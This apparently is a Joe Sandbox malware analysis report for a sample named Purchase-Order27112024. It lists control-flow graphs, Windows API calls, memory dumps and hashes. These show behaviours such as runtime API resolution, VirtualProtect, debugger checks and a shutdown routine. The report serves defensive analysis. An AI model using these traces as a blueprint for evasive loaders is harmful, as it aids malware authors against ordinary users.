                                                                                                      control_flow_graph 107 3700c803-3700c80b GetProcAddress 108 3700c82d 107->108 109 3700c80d-3700c81a VirtualProtect 107->109 112 3700c82f-3700c833 108->112 110 3700c82c 109->110 111 3700c81c-3700c82a VirtualProtect 109->111 110->108 111->110 113 3700c872 call 3700c877 112->113 114 3700c835-3700c83d GetModuleHandleA 112->114 116 3700c83f-3700c847 114->116 116->116 117 3700c849-3700c84c 116->117 117->112 118 3700c84e-3700c850 117->118 119 3700c852-3700c854 118->119 120 3700c856-3700c85e 118->120 121 3700c85f-3700c865 GetProcAddress 119->121 120->121 124 3700c866-3700c86e 121->124 126 3700c870 124->126 126->117
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(00000000,3700C7F4), ref: 3700C804
                                                                                                      • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,3700C7F4,3700C7DD), ref: 3700C816
                                                                                                      • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,3700C7F4,3700C7DD), ref: 3700C82A
                                                                                                      • GetModuleHandleA.KERNEL32(?,3700C7DD), ref: 3700C838
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 3700C860
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 2152742572-0
                                                                                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                      • Instruction ID: 329396a09b8218e703c44d7a77eb92d2dd391a731156605571dc599e5b4dd8f5
                                                                                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                      • Instruction Fuzzy Hash: 0CF0F0B5A897413CFA1145B40C45EFB5FCC8B276B0B241BD6E210C7183D8A985068BFE

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 187 404b6e-404bba GetDlgItem * 2 188 404bc0-404c54 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 187->188 189 404ddb-404de2 187->189 190 404c63-404c6a DeleteObject 188->190 191 404c56-404c61 SendMessageW 188->191 192 404de4-404df4 189->192 193 404df6 189->193 195 404c6c-404c74 190->195 191->190 194 404df9-404e02 192->194 193->194 196 404e04-404e07 194->196 197 404e0d-404e13 194->197 198 404c76-404c79 195->198 199 404c9d-404ca1 195->199 196->197 201 404ef1-404ef8 196->201 204 404e22-404e29 197->204 205 404e15-404e1c 197->205 202 404c7b 198->202 203 404c7e-404c9b call 405f6a SendMessageW * 2 198->203 199->195 200 404ca3-404ccf call 40419a * 2 199->200 243 404cd5-404cdb 200->243 244 404d9a-404dad GetWindowLongW SetWindowLongW 200->244 209 404f69-404f71 201->209 210 404efa-404f00 201->210 202->203 203->199 206 404e2b-404e2e 204->206 207 404e9e-404ea1 204->207 205->201 205->204 215 404e30-404e37 206->215 216 404e39-404e4e call 404abc 206->216 207->201 220 404ea3-404ead 207->220 212 404f73-404f79 SendMessageW 209->212 213 404f7b-404f82 209->213 218 405151-405163 call 404201 210->218 219 404f06-404f10 210->219 212->213 223 404f84-404f8b 213->223 224 404fb6-404fbd 213->224 215->207 215->216 216->207 242 404e50-404e61 216->242 219->218 227 404f16-404f25 SendMessageW 219->227 221 404ebd-404ec7 220->221 222 404eaf-404ebb SendMessageW 220->222 221->201 230 404ec9-404ed3 221->230 222->221 231 404f94-404f9b 223->231 232 404f8d-404f8e ImageList_Destroy 223->232 235 405113-40511a 224->235 236 404fc3-404fcf call 4011ef 224->236 227->218 237 404f2b-404f3c SendMessageW 227->237 238 404ee4-404eee 230->238 239 404ed5-404ee2 230->239 240 404fa4-404fb0 231->240 241 404f9d-404f9e GlobalFree 231->241 232->231 235->218 248 40511c-405123 235->248 261 404fd1-404fd4 236->261 262 404fdf-404fe2 236->262 246 404f46-404f48 237->246 247 404f3e-404f44 237->247 238->201 239->201 240->224 241->240 242->207 250 404e63-404e65 242->250 251 404cde-404ce5 243->251 249 404db3-404db7 244->249 253 404f49-404f62 call 401299 SendMessageW 246->253 247->246 247->253 248->218 254 405125-40514f ShowWindow GetDlgItem ShowWindow 248->254 255 404dd1-404dd9 call 4041cf 249->255 256 404db9-404dcc ShowWindow call 4041cf 249->256 257 404e67-404e6e 250->257 258 404e78 250->258 259 404d7b-404d8e 251->259 260 404ceb-404d13 251->260 253->209 254->218 255->189 256->218 268 404e70-404e72 257->268 269 404e74-404e76 257->269 272 404e7b-404e97 call 40117d 258->272 259->251 276 404d94-404d98 259->276 270 404d15-404d4b SendMessageW 260->270 271 404d4d-404d4f 260->271 273 404fd6 261->273 274 404fd7-404fda call 404b3c 261->274 264 405023-405047 call 4011ef 262->264 265 404fe4-404ffd call 4012e2 call 401299 262->265 289 4050e9-4050fd InvalidateRect 264->289 290 40504d 264->290 295 40500d-40501c SendMessageW 265->295 296 404fff-405005 265->296 268->272 269->272 270->259 277 404d51-404d60 SendMessageW 271->277 278 404d62-404d78 SendMessageW 271->278 272->207 273->274 274->262 276->244 276->249 277->259 278->259 289->235 292 4050ff-40510e call 404a8f call 4049d6 289->292 293 405050-40505b 290->293 292->235 297 4050d1-4050e3 293->297 298 40505d-40506c 293->298 295->264 299 405007 296->299 300 405008-40500b 296->300 297->289 297->293 302 40506e-40507b 298->302 303 40507f-405082 298->303 299->300 300->295 300->296 302->303 304 405084-405087 303->304 305 405089-405092 303->305 307 405097-4050cf SendMessageW * 2 304->307 305->307 308 405094 305->308 307->297 308->307
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404B91
                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BDB
                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                                                                                      • SetWindowLongW.USER32(?,000000FC,00405166), ref: 00404C07
                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C1B
                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C61
                                                                                                      • DeleteObject.GDI32(00000000), ref: 00404C64
                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404D9F
                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DAD
                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F35
                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F59
                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                                                                                      • GlobalFree.KERNEL32(?), ref: 00404F9E
                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0040513D
                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                                                                                      • ShowWindow.USER32(00000000), ref: 0040514F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                      • String ID: $M$N
                                                                                                      • API String ID: 1638840714-813528018
                                                                                                      • Opcode ID: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
                                                                                                      • Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
                                                                                                      • Opcode Fuzzy Hash: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
                                                                                                      • Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 309 40335a-4033f2 #17 SetErrorMode OleInitialize call 4062b2 SHGetFileInfoW call 405f48 GetCommandLineW call 405f48 GetModuleHandleW 316 4033f4-4033f6 309->316 317 4033fb-40340f call 4059c0 CharNextW 309->317 316->317 320 40350a-403510 317->320 321 403414-40341a 320->321 322 403516 320->322 323 403423-40342a 321->323 324 40341c-403421 321->324 325 40352a-403544 GetTempPathW call 403326 322->325 327 403432-403436 323->327 328 40342c-403431 323->328 324->323 324->324 332 403546-403564 GetWindowsDirectoryW lstrcatW call 403326 325->332 333 40359c-4035b6 DeleteFileW call 402dbc 325->333 330 4034f7-403506 call 4059c0 327->330 331 40343c-403442 327->331 328->327 330->320 349 403508-403509 330->349 335 403444-40344b 331->335 336 40345c-403495 331->336 332->333 352 403566-403596 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 332->352 354 403667-403676 call 40382d OleUninitialize 333->354 355 4035bc-4035c2 333->355 342 403452 335->342 343 40344d-403450 335->343 337 4034b2-4034ec 336->337 338 403497-40349c 336->338 346 4034f4-4034f6 337->346 347 4034ee-4034f2 337->347 338->337 344 40349e-4034a6 338->344 342->336 343->336 343->342 350 4034a8-4034ab 344->350 351 4034ad 344->351 346->330 347->346 353 403518-403525 call 405f48 347->353 349->320 350->337 350->351 351->337 352->333 352->354 353->325 367 403772-403778 354->367 368 40367c-40368c call 405724 ExitProcess 354->368 359 403657-403663 call 40391f 355->359 360 4035c8-4035d3 call 4059c0 355->360 359->354 371 403621-40362b 360->371 372 4035d5-40360a 360->372 369 403815-40381d 367->369 370 40377e-40379b call 4062b2 * 3 367->370 379 403823-403827 ExitProcess 369->379 380 40381f 369->380 402 4037e5-4037f3 call 4062b2 370->402 403 40379d-40379f 370->403 376 403692-4036ac lstrcatW lstrcmpiW 371->376 377 40362d-40363b call 405a9b 371->377 375 40360c-403610 372->375 382 403612-403617 375->382 383 403619-40361d 375->383 376->354 385 4036ae-4036c4 CreateDirectoryW SetCurrentDirectoryW 376->385 377->354 392 40363d-403653 call 405f48 * 2 377->392 380->379 382->383 387 40361f 382->387 383->375 383->387 389 4036d1-4036fa call 405f48 385->389 390 4036c6-4036cc call 405f48 385->390 387->371 400 4036ff-40371b call 405f6a DeleteFileW 389->400 390->389 392->359 409 40375c-403764 400->409 410 40371d-40372d CopyFileW 400->410 414 403801-40380c ExitWindowsEx 402->414 415 4037f5-4037ff 402->415 403->402 407 4037a1-4037a3 403->407 407->402 412 4037a5-4037b7 GetCurrentProcess 407->412 409->400 416 403766-40376d call 405de2 409->416 410->409 413 40372f-40374f call 405de2 call 405f6a call 4056c3 410->413 412->402 424 4037b9-4037db 412->424 413->409 431 403751-403758 CloseHandle 413->431 414->369 418 40380e-403810 call 40140b 414->418 415->414 415->418 416->354 418->369 424->402 431->409
                                                                                                      APIs
                                                                                                      • #17.COMCTL32 ref: 00403379
                                                                                                      • SetErrorMode.KERNEL32(00008001), ref: 00403384
                                                                                                      • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                                                        • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                                                                        • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                                                                        • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                                                                      • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                                                                        • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                                                                      • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
                                                                                                      • CharNextW.USER32(00000000,00434000,00000020), ref: 00403403
                                                                                                      • GetTempPathW.KERNEL32(00000400,00436800,00000000,?), ref: 0040353B
                                                                                                      • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040354C
                                                                                                      • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403558
                                                                                                      • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040356C
                                                                                                      • lstrcatW.KERNEL32(00436800,Low), ref: 00403574
                                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403585
                                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040358D
                                                                                                      • DeleteFileW.KERNEL32(00436000), ref: 004035A1
                                                                                                      • OleUninitialize.OLE32(?), ref: 0040366C
                                                                                                      • ExitProcess.KERNEL32 ref: 0040368C
                                                                                                      • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 00403698
                                                                                                      • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 004036A4
                                                                                                      • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 004036B0
                                                                                                      • SetCurrentDirectoryW.KERNEL32(00436800), ref: 004036B7
                                                                                                      • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                                                                      • CopyFileW.KERNEL32(00437800,0041FEA8,00000001), ref: 00403725
                                                                                                      • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                                                                      • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                                                                      • ExitProcess.KERNEL32 ref: 00403827
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                      • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                      • API String ID: 4107622049-1875889550
                                                                                                      • Opcode ID: d952f9c30b305397e7321c136bd4514fabccd71d09d56b1e0123fd5a1a2d1ce8
                                                                                                      • Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
                                                                                                      • Opcode Fuzzy Hash: d952f9c30b305397e7321c136bd4514fabccd71d09d56b1e0123fd5a1a2d1ce8
                                                                                                      • Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E
                                                                                                      APIs
                                                                                                      • DeleteFileW.KERNEL32(?,?,00436800,76232EE0,00434000), ref: 004057F9
                                                                                                      • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,00436800,76232EE0,00434000), ref: 00405841
                                                                                                      • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,00436800,76232EE0,00434000), ref: 00405864
                                                                                                      • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,00436800,76232EE0,00434000), ref: 0040586A
                                                                                                      • FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,00436800,76232EE0,00434000), ref: 0040587A
                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                                                                                      • FindClose.KERNEL32(00000000), ref: 00405929
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                      • String ID: \*.*
                                                                                                      • API String ID: 2035342205-1173974218
                                                                                                      • Opcode ID: 3bfd9f40d867dfb13d75fcd1b7ef3c21c8eb5f8be3eae84d4eb3b7d6c7e95577
                                                                                                      • Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
                                                                                                      • Opcode Fuzzy Hash: 3bfd9f40d867dfb13d75fcd1b7ef3c21c8eb5f8be3eae84d4eb3b7d6c7e95577
                                                                                                      • Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                                                                      • Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
                                                                                                      • Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                                                                      • Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44
                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNEL32(00436800,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,00436800,?,76232EE0,004057F0,?,00436800,76232EE0), ref: 00406296
                                                                                                      • FindClose.KERNEL32(00000000), ref: 004062A2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                      • String ID: 8WB
                                                                                                      • API String ID: 2295610775-3088156181
                                                                                                      • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                                                                      • Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
                                                                                                      • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                                                                      • Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D
                                                                                                      APIs
                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 370061DA
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 370061E4
                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 370061F1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                      • String ID:
                                                                                                      • API String ID: 3906539128-0
                                                                                                      • Opcode ID: deebfc122553c54d9d3913a739eb27c8a22f0defff1e57f7937a0b4eb09835c5
                                                                                                      • Instruction ID: ba84ad257589d99016d8eb9f1e28b270216102d3dce4b458714c79b3370d082f
                                                                                                      • Opcode Fuzzy Hash: deebfc122553c54d9d3913a739eb27c8a22f0defff1e57f7937a0b4eb09835c5
                                                                                                      • Instruction Fuzzy Hash: 6231C57494122C9BDB21DF64D988BCDBBF8BF08320F5041DAE81CA7250E7749B858F55
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(?,?,37004A8A,?,37012238,0000000C,37004BBD,00000000,00000000,00000001,37002082,37012108,0000000C,37001F3A,?), ref: 37004AD5
                                                                                                      • TerminateProcess.KERNEL32(00000000,?,37004A8A,?,37012238,0000000C,37004BBD,00000000,00000000,00000001,37002082,37012108,0000000C,37001F3A,?), ref: 37004ADC
                                                                                                      • ExitProcess.KERNEL32 ref: 37004AEE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                      • String ID:
                                                                                                      • API String ID: 1703294689-0
                                                                                                      • Opcode ID: 2f46ccecbff64199a59c625f2f9bd0529fad5a5dfa8630ccf13a7aa1c1dae3b1
                                                                                                      • Instruction ID: 6dff514d88ab5fc6754a9a30f77b30a565838d52fdf303b247f64c849eb47dd8
                                                                                                      • Opcode Fuzzy Hash: 2f46ccecbff64199a59c625f2f9bd0529fad5a5dfa8630ccf13a7aa1c1dae3b1
                                                                                                      • Instruction Fuzzy Hash: E0E0BF35040204AFEF016F55CD09B493BA9FF42371B514094F919A7121DB39D953CE59
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HeapProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 54951025-0
                                                                                                      • Opcode ID: d99399c43b44871a00681f5dbd81342f2d9c1c03ca0c9aa8969bfa0371459849
                                                                                                      • Instruction ID: a378ed0273b9ead258a4a1455181297d174dc52790f5ce8f93b146292c0c2ed1
                                                                                                      • Opcode Fuzzy Hash: d99399c43b44871a00681f5dbd81342f2d9c1c03ca0c9aa8969bfa0371459849
                                                                                                      • Instruction Fuzzy Hash: 0DA011302802028FCB208F388A0B30E3AECBA082A03020028A80CE0000EB2880028B00

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 136 405331-40534c 137 405352-40541b GetDlgItem * 3 call 4041cf call 404a8f GetClientRect GetSystemMetrics SendMessageW * 2 136->137 138 4054dd-4054e4 136->138 161 405439-40543c 137->161 162 40541d-405437 SendMessageW * 2 137->162 140 4054e6-405508 GetDlgItem CreateThread CloseHandle 138->140 141 40550e-40551b 138->141 140->141 143 405539-405543 141->143 144 40551d-405523 141->144 147 405545-40554b 143->147 148 405599-40559d 143->148 145 405525-405534 ShowWindow * 2 call 4041cf 144->145 146 40555e-405567 call 404201 144->146 145->143 158 40556c-405570 146->158 151 405573-405583 ShowWindow 147->151 152 40554d-405559 call 404173 147->152 148->146 155 40559f-4055a5 148->155 159 405593-405594 call 404173 151->159 160 405585-40558e call 4051f2 151->160 152->146 155->146 156 4055a7-4055ba SendMessageW 155->156 163 4055c0-4055eb CreatePopupMenu call 405f6a AppendMenuW 156->163 164 4056bc-4056be 156->164 159->148 160->159 165 40544c-405463 call 40419a 161->165 166 40543e-40544a SendMessageW 161->166 162->161 173 405600-405615 TrackPopupMenu 163->173 174 4055ed-4055fd GetWindowRect 163->174 164->158 175 405465-405479 ShowWindow 165->175 176 405499-4054ba GetDlgItem SendMessageW 165->176 166->165 173->164 177 40561b-405632 173->177 174->173 178 405488 175->178 179 40547b-405486 ShowWindow 175->179 176->164 180 4054c0-4054d8 SendMessageW * 2 176->180 181 405637-405652 SendMessageW 177->181 182 40548e-405494 call 4041cf 178->182 179->182 180->164 181->181 183 405654-405677 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 181->183 182->176 185 405679-4056a0 SendMessageW 183->185 185->185 186 4056a2-4056b6 GlobalUnlock SetClipboardData CloseClipboard 185->186 186->164
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405390
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                                                                                      • GetClientRect.USER32(?,?), ref: 004053DC
                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 004053E4
